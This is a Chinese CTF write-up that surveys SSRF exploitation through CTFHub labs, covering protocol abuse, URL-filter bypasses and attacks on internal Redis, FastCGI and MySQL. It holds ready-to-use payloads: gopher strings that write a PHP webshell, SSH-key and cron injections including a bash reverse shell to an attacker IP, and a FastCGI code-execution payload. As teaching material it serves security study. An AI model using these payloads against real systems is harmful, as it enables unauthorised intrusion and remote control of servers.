用CTFHUB总结SSRF攻击方式

漏洞详情

SSRF（Server-Side Request Forgery:服务器端请求伪造）是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。正是因为恶意请求由服务端发起，而服务端能够请求到与自身相连而与外网隔绝的内部网络系统，所以一般情况下，SSRF的攻击目标是攻击者无法直接访问的内网系统。

SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地址做过滤和限制。例如，黑客操作服务端从指定URL地址获取网页文本内容，加载指定地址的图片，下载等，利用的就是服务端请求伪造，SSRF漏洞可以利用存在缺陷的WEB应用作为代理攻击远程和本地的服务器。

    服务器Ubuntu为WEB服务器，可被攻击者访问，内网中的其他服务器无法被攻击者直接访问。假设服务器Ubuntu中的某个WEB应用存在SSRF漏洞，那我们就可以操作这个WEB服务器去读取本地的文件、探测内网主机存活、探测内网主机端口等，如果借助相关网络协议，我们还可以攻击内网中的Redis、MySql、FastCGI等应用，WEB服务器在整个攻击过程中被作为中间人进行利用。

容易出现SSRF的地方有：

1）分享：通过URL地址分享网页内容

2）转码服务

3）在线翻译

4）图片加载与下载：通过URL地址加载或下载图片

5）图片、文章收藏功能

6）未公开的api实现以及其他调用URL的功能

7）从URL关键字中寻找

总而言之就是会和请求服务器链接、图片等资源的地方

SSRF漏洞的危害：

1.对外网、服务器所在内网、服务器本地进行端口扫描，获取一些服务的banner信息等。2.攻击运行在内网或服务器本地的其他应用程序，如redis、mysql等。3.对内网Web应用进行指纹识别，识别企业内部的资产信息。4.攻击内外网的Web应用，主要是使用HTTP GET/POST请求就可以实现的攻击，如sql注入、文件上传等。5.利用file协议读取服务器本地文件等。6.进行跳板攻击等。

SSRF漏洞利用的相关协议

SSRF漏洞的利用所涉及的协议有：

•file协议：在有回显的情况下，利用 file 协议可以读取任意文件的内容•dict协议：泄露安装软件版本信息，查看端口，操作内网redis服务等•gopher协议：gopher支持发出GET、POST请求。可以先截获get请求包和post请求包，再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell•http/s协议：探测内网主机存活•更多伪协议利用方式可以参考：https://xz.aliyun.com/t/6373#toc-8

常见伪协议利用方式（file、http/s和dict协议）

SSRF的利用主要就是读取内网文件、探测内网主机存活、扫描内网端口、攻击内网其他应用等，而这些利用的手法无一不与这些协议息息相关。

读取内网文件（file协议）

我们构造如下payload，即可将服务器上的本地文件及网站源码读取出来（需要知道绝对路径）：

ssrf.php?url=file:///etc/passwdssrf.php?url=file:///var/www/html/flag.php

探测内网主机存活（http/s协议）

一般是先想办法得到目标主机的网络配置信息，如读取/etc/hosts、/proc/net/arp、/proc/net/fib_trie等文件，从而获得目标主机的内网网段并进行爆破。

域网IP地址范围分三类，以下IP段为内网IP段：

C类：192.168.0.0 - 192.168.255.255 B类：172.16.0.0 - 172.31.255.255 A类：10.0.0.0 - 10.255.255.255

构造如下payload，便可通过服务器发送请求去探测内网存活的主机：

ssrf.php?url=http://192.168.52.1ssrf.php?url=http://192.168.52.6ssrf.php?url=http://192.168.52.25......

借助burpsuite的Intruder模块进行爆破即可

扫描内网端口（http/s和dict协议）

我们利用dict协议构造如下payload即可查看内网主机上开放的端口及端口上运行服务的版本信息等：

ssrf.php?url=dict://127.0.0.1:6379/info   // redisssrf.php?url=dict://127.0.0.1:80/info     // httpssrf.php?url=dict://127.0.0.1:22/info   // ssh

同样可以借助burpsuite来爆破内网主机上的服务。

常见攻击方式（Gopher协议）

Gopher协议在SSRF中的利用

Gopher是Internet上一个非常有名的信息查找系统，它将Internet上的文件组织成某种索引，很方便地将用户从Internet的一处带到另一处。在WWW出现之前，Gopher是Internet上最主要的信息检索工具，Gopher站点也是最主要的站点，使用TCP 70端口。但在WWW出现后，Gopher失去了昔日的辉煌。

现在的Gopher协议已经很少有人再使用它了，但是该协议在SSRF中却可以发挥巨大的作用，可以说是SSRF中的万金油。由于Gopher协议支持发出GET、POST请求，我们可以先截获GET请求包和POST请求包，再构造成符合Gopher协议请求的payload进行SSRF利用，甚至可以用它来攻击内网中的Redis、MySql、FastCGI等应用，这无疑大大扩展了我们的SSRF攻击面。

（1）Gopher协议格式

URL: gopher://<host>:<port>/<gopher-path>_后接TCP数据流# 注意不要忘记后面那个下划线"_"，下划线"_"后面才开始接TCP数据流，如果不加这个"_"，那么服务端收到的消息将不是完整的，该字符可随意写。

•gopher的默认端口是70•如果发起POST请求，回车换行需要使用 %0d%0a来代替 %0a，如果多个参数，参数之间的&也需要进行URL编码

那么如何利用Gopher发送HTTP的请求呢？例如GET请求。我们直接发送一个原始的HTTP包不就行了吗。在gopher协议中发送HTTP的数据，需要以下三步：

1.抓取或构造HTTP数据包2.URL编码、将回车换行符 %0a替换为 %0d%0a3.再一次编码，发送符合gopher协议格式的请求4.可能是因为请求是直接get gopher链接的，有时候还需要再url编码一次。一共三次

（2）利用Gopher协议发送HTTP POST请求

这里以POST请求为案例，用ctfhub的SSRF-POST 请求为实验环境

根据了解题目，需要将key=da7b0ff80038f11a3823ab0d8788bf94 POST给flag.php, 构造HTTP POST请求

POST /flag.php HTTP/1.1Host: 127.0.0.1:80Content-Type: application/x-www-form-urlencodedContent-Length: 36key=da7b0ff80038f11a3823ab0d8788bf94

第一次URL编码

然后将第一次编码后的url中%0a替换为 %0d%0a

替换完成后，第二次编码， 

第二次编码后的url:POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252011%250D%250A%250D%250Akey%253Dda7b0ff80038f11a3823ab0d8788bf94%250D%250A第三次编码后的url:POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252011%250D%250A%250D%250Akey%253Dda7b0ff80038f11a3823ab0d8788bf94%250D%250A用第三次编码后的url 构造符合gopher协议的请求：gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252011%250D%250A%250D%250Akey%253Dda7b0ff80038f11a3823ab0d8788bf94%250D%250A

然后在链接里请求，即得到了flag:

注意这几个问题：

1.问号（?）需要转码为URL编码，也就是%3f2.回车换行要变为%0d%0a,但如果直接用工具转，可能只会有%0a3.在HTTP包的最后要加%0d%0a，代表消息结束（具体可研究HTTP包结束）4.上面的POST请求中那四个HTTP头是POST请求必须的，即POST Host、Content-Type和Content-Length。如果少了会报错的，而GET则不用

相关绕过姿势

对于SSRF的限制大致有如下几种：

•限制请求的端口只能为Web端口，只允许访问HTTP和HTTPS的请求。•限制域名只能为http://www.xxx.com•限制不能访问内网的IP，以防止对内网进行攻击。•屏蔽返回的详细信息。

（1）利用HTTP基本身份认证的方式绕过

如果目标代码限制访问的域名只能为 http://www.xxx.com ，那么我们可以采用HTTP基本身份认证的方式绕过。即@：

http://[email protected]还有其他的但是不太常用2.?号绕过url=http://www.aaaa.com?www.xxx.com3.#绕过url=http://www.aaaa.com#www.xxx.com4.斜杠/绕过url=http://www.aaaa.com/www.xxx.com等等等等

CTFHub Url Bypass

（2）利用302跳转绕过内网IP

绕过对内网ip的限制我们可以利用302跳转的方法，有以下两种。

（1）网络上存在一个很神奇的服务，网址为 http://xip.io，访问这个域名会通过302重定向到xip.io后的路径或者域名

当我们访问：http://127.0.0.1.xip.io/flag.php 时，实际上访问的是http://127.0.0.1/1.php 。像这种网址还有http://nip.io，http://sslip.io 。

（2）短地址跳转绕过，这里也给出一个网址：http://92.xswzl.cn/

（3）进制的转换绕过内网IP

其他各种指向127.0.0.1的地址

http://localhost/         # localhost就是代指127.0.0.1   http://0/                 # 0在window下代表0.0.0.0，而在liunx下代表127.0.0.1http://0.0.0.0/            # 0.0.0.0这个IP地址表示整个网络，可以代表本机 ipv4 的所有地址http://[0:0:0:0:0:ffff:127.0.0.1]/     # 在liunx下可用，window测试了下不行   http://[::]:80/              # 在liunx下可用，window测试了下不行   http://127。0。0。1/          # 用中文句号绕过http://①②⑦.⓪.⓪.①http://127.1/http://127.00000.00000.001/  # 0的数量多一点少一点都没影响，最后还是会指向127.0.0.1http://0x7F000001            #可以使用十六进制进行http://0177.0.0.1/         #不知道啥原理，记录下

利用ctfhub演示一下

（4）利用不存在的协议头绕过指定的协议头

file_get_contents()函数的一个特性，即当PHP的 file_get_contents() 函数在遇到不认识的协议头时候会将这个协议头当做文件夹，造成目录穿越漏洞，这时候只需不断往上跳转目录即可读到根目录的文件。（include()函数也有类似的特性）

上面的代码限制了url只能是以https开头的路径，那么我们就可以如下：

httpsssss://

当 file_get_contents() 函数遇到了不认识的伪协议头“httpsssss://”，就会将他当做文件夹，然后再配合目录穿越即可读取文件：

ssrf.php?url=httpsssss://../../../../../../etc/passwdssrf.php?url=httpsssss://abc../../../../../../etc/passwd

这个方法可以在SSRF的众多协议被禁止且只能使用它规定的某些协议的情况下来进行读取文件。

（5）利用URL的解析问题

该思路来自Orange Tsai成员在2017 BlackHat 美国黑客大会上做的题为《A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages》的分享。主要是利用readfile和parseurl函数的解析差异以及curl和parseurl解析差异来进行绕过。

（1）利用readfile和parse_url函数的解析差异绕过指定的端口

测试代码：

// ssrf.php<?php $url = 'http://'. $_GET[url];     $parsed = parse_url($url);    if( $parsed[port] == 80 ){  // 这里限制了我们传过去的url只能是80端口的      readfile($url);}    else {      die('Hacker!');    }?>

用python在当前目录下起一个端口为11211的WEB服务：


上述代码限制了我们传过去的url只能是80端口的，但如果我们想去读取11211端口的文件的话，我们可以用以下方法绕过：

ssrf.php?url=127.0.0.1:11211:80/flag.txt


如上图所示成功读取了11211端口中的flag.txt文件，下面用BlackHat的图来说明原理：

从上图中可以看出readfile()函数获取的端口是最后冒号前面的一部分（11211），而parse_url()函数获取的则是最后冒号后面的的端口（80），利用这种差异的不同，从而绕过WAF。

这两个函数在解析host的时候也有差异，如下图：

readfile()函数获取的是@号后面一部分（evil.com），而parseurl()函数获取的则是@号前面的一部分（google.com），利用这种差异的不同，我们可以绕过题目中parseurl()函数对指定host的限制。

（2）利用curl和parse_url的解析差异绕指定的host

原理如下：

从上图中可以看到curl()函数解析的是第一个@后面的网址，而parseurl()函数解析的是第二个@后面的网址。利用这个原理我们可以绕过题目中parseurl()函数对指定host的限制。

ssrf.php?url=http://@127.0.0.1:[email protected]/flag.php

不过这个方法在Curl较新的版本里被修掉了，所以我们还可以使用另一种方法，即 0.0.0.0。0.0.0.0 这个IP地址表示整个网络，可以代表本机 ipv4 的所有地址，使用如下即可绕过：

ssrf.php?url=http://0.0.0.0/flag.php

但是这只适用于Linux系统上，Windows系统的不行。

攻击内网Redis

Redis是数据库的意思。Redis（Remote Dictionary Server )，即远程字典服务，是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。

什么是Redis未授权访问？

Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空），会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的提供的 config 命令，可以进行写文件操作，攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中，进而可以使用对应私钥直接使用ssh服务登录目标服务器。

简单说，漏洞的产生条件有以下两点：

•redis 绑定在 0.0.0.0:6379，且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略，直接暴露在公网。•没有设置密码认证（一般为空），可以免密码远程登录redis服务。

在SSRF漏洞中，如果通过端口扫描等方法发现目标主机上开放6379端口，则目标主机上很有可能存在Redis服务。此时，如果目标主机上的Redis由于没有设置密码认证、没有进行添加防火墙等原因存在未授权访问漏洞的话，那我们就可以利用Gopher协议远程操纵目标主机上的Redis，可以利用 Redis 自身的提供的 config 命令向目标主机写WebShell、写SSH公钥、创建计划任务反弹Shell等，其思路都是一样的，就是先将Redis的本地数据库存放目录设置为web目录、~/.ssh目录或/var/spool/cron目录等，然后将dbfilename（本地数据库文件名）设置为文件名你想要写入的文件名称，最后再执行save或bgsave保存，则我们就指定的目录里写入指定的文件了。

下面使用ctfhub上的SSRF Redis题目演示：

绝对路径写WebShell

首先构造redis命令:

flushallset 1 '<?php eval($_POST["cmd"]);?>'config set dir /var/www/htmlconfig set dbfilename shell.phpsave

然后将其转化为Gopher协议的格式（执行转换脚本工具），然后再将其二次URL编码：

下载地址：https://github.com/firebroo/sec_toolshttps://github.com/tarunkant/Gopherus

执行后生成payload如下：

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2433%0D%0A%0A%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27cmd%27%5D%29%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

生成的payload要进行url二次编码（因为我们发送payload用的是GET方法），利用服务器上的SSRF漏洞，将二次编码后的payload打过去就行了：

二次URL编码后：gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252433%250D%250A%250A%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527cmd%2527%255D%2529%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A最终的URL：http://challenge-654d3801a12c5695.sandbox.ctfhub.com:10080/?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252433%250D%250A%250A%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527cmd%2527%255D%2529%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

如下所示，菜刀连接，成功在主机上面写入WebShell：

写入SSH公钥

同样，我们也可以直接这个存在Redis未授权的主机的/.ssh目录下写入SSH公钥，直接实现免密登录，但前提是/.ssh目录存在，如果不存在我们可以写入计划任务来创建该目录。（同样需要进行协议转换，二次编码，略过）

构造redis命令：

flushallset 1 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDrCwrA1zAhmjeG6E/45IEs/9a6AWfXb6iwzo+D62y8MOmt+sct27ZxGOcRR95FT6zrfFxqt2h56oLwml/Trxy5sExSQ/cvvLwUTWb3ntJYyh2eGkQnOf2d+ax2CVF8S6hn2Z0asAGnP3P4wCJlyR7BBTaka9QNH/4xsFDCfambjmYzbx9O2fzl8F67jsTq8BVZxy5XvSsoHdCtr7vxqFUd/bWcrZ5F1pEQ8tnEBYsyfMK0NuMnxBdquNVSlyQ/NnHKyWtI/OzzyfvtAGO6vf3dFSJlxwZ0aC15GOwJhjTpTMKq9jrRdGdkIrxLKe+XqQnjxtk4giopiFfRu8winE9scqlIA5Iu/d3O454ZkYDMud7zRkSI17lP5rq3A1f5xZbTRUlxpa3Pcuolg/OOhoA3iKNhJ/JT31TU9E24dGh2Ei8K+PpT92dUnFDcmbEfBBQz7llHUUBxedy44Yl+SOsVHpNqwFcrgsq/WR5BGqnu54vTTdJh0pSrl+tniHEnWWU= root@whoami'config set dir /root/.ssh/config set dbfilename authorized_keyssave

创建计划任务反弹Shell

 注意：这个只能在Centos上使用，别的不行，好像是由于权限的问题。（同样需要进行协议转换，二次编码，略过）

构造redis的命令如下：

set 1 'nn*/1 * * * * bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1nn'   config set dir /var/spool/cron/config set dbfilename rootsave// 47.xxx.xxx.72为攻击者vps的IP

攻击内网FastCGI

FastCGI指快速通用网关接口（Fast Common Gateway Interface／FastCGI）是一种让交互程序与Web服务器通信的协议。FastCGI是早期通用网关接口（CGI）的增强版本。FastCGI致力于减少网页服务器与CGI程序之间交互的开销，从而使服务器可以同时处理更多的网页请求。

众所周知，在网站分类中存在一种分类就是静态网站和动态网站，两者的区别就是静态网站只需要通过浏览器进行解析，而动态网站需要一个额外的编译解析的过程。以Apache为例，当访问动态网站的主页时，根据容器的配置文件，它知道这个页面不是静态页面，Web容器就会把这个请求进行简单的处理，然后如果使用的是CGI，就会启动CGI程序（对应的就是PHP解释器）。接下来PHP解析器会解析php.ini文件，初始化执行环境，然后处理请求，再以规定CGI规定的格式返回处理后的结果，退出进程，Web server再把结果返回给浏览器。这就是一个完整的动态PHP Web访问流程。

这里说的是使用CGI，而FastCGI就相当于高性能的CGI，与CGI不同的是它像一个常驻的CGI，在启动后会一直运行着，不需要每次处理数据时都启动一次，所以FastCGI的主要行为是将CGI解释器进程保持在内存中，并因此获得较高的性能 。

php-fpm

FPM（FastCGI 进程管理器）可以说是FastCGI的一个具体实现，用于替换 PHP FastCGI 的大部分附加功能，对于高负载网站是非常有用的。

攻击FastCGI的主要原理就是，在设置环境变量实际请求中会出现一个 SCRIPT_FILENAME': '/var/www/html/index.php 这样的键值对，它的意思是php-fpm会执行这个文件，但是这样即使能够控制这个键值对的值，但也只能控制php-fpm去执行某个已经存在的文件，不能够实现一些恶意代码的执行。

而在PHP 5.3.9后来的版本中，PHP增加了安全选项导致只能控制php-fpm执行一些php、php4这样的文件，这也增大了攻击的难度。但是好在PHP允许通过PHPADMINVALUE和PHP_VALUE去动态修改PHP的设置。

那么当设置PHP环境变量为：auto_prepend_file=php://input;allow_url_include = On 时，就会在执行PHP脚本之前包含环境变量 auto_prepend_file 所指向的文件内容， php://input 也就是接收POST的内容，这个我们可以在FastCGI协议的body控制为恶意代码，这样就在理论上实现了php-fpm任意代码执行的攻击。

详情请见：《SSRF系列之攻击FastCGI》

并且WEB服务器Ubuntu上存在FastCGI，那么我们就可以利用其SSRF漏洞去攻击其本地的FastCGI。

假设在配置fpm时，将监听的地址设为了0.0.0.0:9000，那么就会产生php-fpm未授权访问漏洞，此时攻击者可以无需利用SSRF从服务器本地访问的特性，直接与服务器9000端口上的php-fpm进行通信，进而可以用fcgi_exp等工具去攻击服务器上的php-fpm实现任意代码执行。

当内网中的其他主机上配置有fpm，且监听的地址为0.0.0.0:9000时，那么这台主机就可能存在php-fpm未授权访问漏洞，我们便可以利用Ubuntu服务器上的SSRF去攻击他，如果内网中的这台主机不存在php-fpm未授权访问漏洞，那么就直接利用Ubuntu服务器上的SSRF去攻击他显然是不行的。

使用Gopherus工具攻击

下载地址：https://github.com/tarunkant/Gopherus

该工具可以帮你生成符合Gopher协议格式的payload，以利用SSRF攻击Redis、FastCGI、MySql等内网应用。

使用Gopherus工具生成攻击FastCGI的payload：

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00注意这里不要不要把换行符也复制进去了，否则是不成功的

然后还是将得到的payload进行二次url编码，将最终得到的payload放到?url=后面打过去过去：

gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH54%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%25006%2504%2500%253C%253Fphp%2520system%2528%2527ls%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500同样注意不要在编码是加入换行符，否则不成功

命令执行成功。

有关FastCgi在ssrf中的利用可以参考：https://bbs.ichunqiu.com/thread-58455-1-1.html

https://blog.csdn.net/mysteryflower/article/details/94386461

攻击内网MySql

首先我们要先了解一下MySql数据库用户认证的过程。MySQL分为服务端和客户端。MySQL数据库用户认证采用的是 挑战/应答 的方式，即服务器生成该挑战码(scramble)并发送给客户端，客户端用挑战码将自己的密码进行加密后，并将相应的加密结果返回给服务器，服务器本地用挑战码的将用户的密码加密，如果加密的结果和用户返回的加密的结果相同则用户认证成功，从而完成用户认证的过程。

登录时需要用服务器发来的挑战码(scramble)将密码加密，但是当数据库用户密码为空时，加密后的密文也为空。客户端给服务端发的认证包就是相对固定的了。这样就无需交互了，可以通过Gopher协议来直接发送了。

使用Gopherus工具可以利用，二次编码后直接打

DNS重绑定 Bypass

这个题没明白啥意思，直接访问就出来了

参考：

部分内容参考了以下链接：

https://mp.weixin.qq.com/s/5iMj-KzRA-Vnc5-oFEvP-g
https://mp.weixin.qq.com/s/0wdxfetcp8TUtLZFWI16uA